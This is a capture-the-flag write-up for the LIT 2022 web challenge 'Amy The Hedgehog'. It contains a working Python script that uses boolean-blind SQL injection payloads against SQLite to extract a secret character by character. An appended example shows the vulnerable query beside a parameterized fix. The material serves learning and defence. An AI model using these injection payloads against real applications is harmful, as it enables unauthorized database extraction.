
LIT 2022

Note : A JOURNEY TO GAIN KNOWLEDGE


Last updated 2 years ago

web/Amy The Hedgehog

import requests

url = "http://litctf.live:31770/"
s = requests.Session()
passwordRetrieve = ""
# Payload templates used earlier to read the table definition from sqlite_master:
# ' or (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('some_char')--
# find column from table: ' or (SELECT hex(substr(sql,{index},1)) FROM sqlite_master WHERE type = 'table' AND tbl_name = 'names') = hex('{char}')-- 
# Candidate characters tried at each position
alpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c"


def solve():
    global passwordRetrieve
    index = 1  # substr() positions are 1-based in SQLite
    len_of_password = 14 - index
    for i in range(len_of_password):
        for char in alpha:
            # Boolean oracle: the condition is true only when the character
            # at position `index` of names.name equals `char`
            passwordfield = f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"
            postParam = {'name': passwordfield}
            response = s.post(url, data=postParam).text
            if "You got it" in response:
                passwordRetrieve += char
                index += 1
                print("Nai here yr pass: ", passwordRetrieve, "  len:", i)
                break
            print(char)  # progress output: character that did not match


solve()
  • Identify SQLite -> sqlite_master -> tbl_name -> column -> name
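
Why the "You got it" response works as a true/false oracle, and what closes it, shown as an added example that is not part of the original writeup or the challenge's code. The server's real query is not on the page, so the query shape, the `make_db` / `check_*` / `probe` helpers and the table contents below are assumptions built on an in-memory SQLite database.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the challenge backend (assumed schema:
    # table `names`, column `name`, as found via sqlite_master above).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE names (name TEXT)")
    conn.execute("INSERT INTO names VALUES ('constructed_secret')")
    return conn


def check_vulnerable(conn, name):
    # Assumed vulnerable form: input is spliced into the SQL text, so a quote
    # ends the string literal and the rest of the input is parsed as SQL.
    query = f"SELECT name FROM names WHERE name = '{name}'"
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return False  # a syntax error is indistinguishable from "no match"


def check_parameterized(conn, name):
    # Hardened form: the value is bound as data, so quotes and the trailing
    # "--" remain part of the compared string and never reach the parser.
    row = conn.execute("SELECT name FROM names WHERE name = ?", (name,)).fetchone()
    return row is not None


def probe(index, char):
    # Same payload template as the script above.
    return f"' or (SELECT hex(substr(name,{index},1)) FROM names) = hex('{char}')--"


if __name__ == "__main__":
    conn = make_db()
    for char in ("c", "x", "'"):
        print(repr(char),
              "vulnerable:", check_vulnerable(conn, probe(1, char)),
              "parameterized:", check_parameterized(conn, probe(1, char)))
```

With the bound parameter every probe returns the same answer, so the response no longer leaks one character per request; the `'` in the script's alphabet only produces a SQL syntax error on the vulnerable path.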
